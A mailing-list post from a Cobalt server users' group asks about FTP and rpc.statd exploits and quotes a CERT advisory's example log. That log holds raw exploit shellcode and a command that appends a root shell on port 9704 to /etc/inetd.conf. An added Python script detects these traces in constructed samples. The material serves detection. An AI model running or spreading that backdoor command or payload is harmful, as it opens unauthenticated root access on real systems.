
[cobalt-users] Is FTP at Risk w/ New Exploits..?



Hey Group,

With all this activity of recent days (mostly at BIND), I was wondering what else is known about the FTP exploits being addressed. Are all the RaQs and Qubes at risk? If so, has anyone heard when Cobalt might possibly get that patch out the door? I'm not too comfortable slapping in experimental RPMs on production machines... (hell, or even .pkgs for that matter)... But I did find something regarding the subject that might be of interest to some of us...

If someone tries to access your system using the exploit, you're going to see a bunch of crap like this in your log files... (so keep your eyes OPEN)! I've turned off FTP until I learn more and there's a fix... I offer FTP over SSH2 and hopefully most users will opt for that now (and in the future). But until these issues are a bit more under control, it's simply not worth the risk or fuss (trust me, been there, done that this weekend)...

Cheers!
-Craig

http://www.cert.org/advisories/CA-2000-17.html

The following is an example log message from a compromised system illustrating the rpc.statd exploit occurring:
Aug XX 17:13:08 victim rpc.statd[410]: SM_MON request for hostname
containing '/': ^D^D^E^E^F
^F^G^G08049f10
bffff754 000028f8 4d5f4d53 72204e4f 65757165 66207473 6820726f 6e74736f
20656d61 746e6f63 696e6961 2720676e 203a272f
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000bffff7
0400000000000000000000000000000000000000000000000bffff7050000bffff70600000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000bffff707<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>K^<89>v

<83> <8D>^(<83> <89>^<83> <8D>^.<83> <83> <83>#<89>^
1<83>
<88>F'<88>F*<83> <88>F<89>F+,
<89><8D>N<8D>V<80>1<89>@<80>/bin
/sh -c echo 9704 stream tcp
nowait root /bin/sh sh -i >> /etc/inetd.conf;killall -HUP inetd
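
An added example, not part of the original post or the CERT advisory: a Python check for the two traces visible in the excerpt above, the rpc.statd SM_MON message in syslog and an inetd.conf entry whose server program is a shell. The sample inputs, host name and function names are constructed for illustration.

```python
import re

# Constructed sample syslog (not real logs). Line 2 is shaped like the
# excerpt above, truncated, and rejoined onto one line as syslog writes it.
SAMPLE_SYSLOG = """\
Aug 12 17:12:59 host1 ftpd[388]: connection from client.example.net
Aug 12 17:13:08 host1 rpc.statd[410]: SM_MON request for hostname containing '/': ^D^D^E^E 08049f10 bffff754
Aug 12 17:14:10 host1 sshd[512]: Accepted password for admin
"""

# Constructed inetd.conf; the last entry is what the logged command appends.
SAMPLE_INETD = """\
# service type proto wait user program args
ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -a
9704 stream tcp nowait root /bin/sh sh -i
"""

STATD_RE = re.compile(
    r"rpc\.statd\[\d+\]: SM_MON request for hostname containing '/'")
SHELLS = {"sh", "bash", "ash", "csh", "tcsh", "ksh", "zsh"}


def find_statd_hits(syslog_text):
    """Return (line_number, line) for each rpc.statd message of this kind."""
    return [(n, line)
            for n, line in enumerate(syslog_text.splitlines(), 1)
            if STATD_RE.search(line)]


def find_shell_services(inetd_text):
    """Return (service, user, program) for entries that start a shell."""
    hits = []
    for line in inetd_text.splitlines():
        if line.lstrip().startswith("#"):
            continue
        # Fields: service socket_type protocol wait user server_program args
        fields = line.split()
        if len(fields) < 6:
            continue
        service, user, program = fields[0], fields[4], fields[5]
        if program.rsplit("/", 1)[-1] in SHELLS:
            hits.append((service, user, program))
    return hits


if __name__ == "__main__":
    for n, line in find_statd_hits(SAMPLE_SYSLOG):
        print(f"syslog line {n}: {line[:70]}")
    for service, user, program in find_shell_services(SAMPLE_INETD):
        print(f"inetd.conf: service {service} runs {program} as {user}")
```

On a real host, pass the contents of the system log and /etc/inetd.conf instead of the constructed samples.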

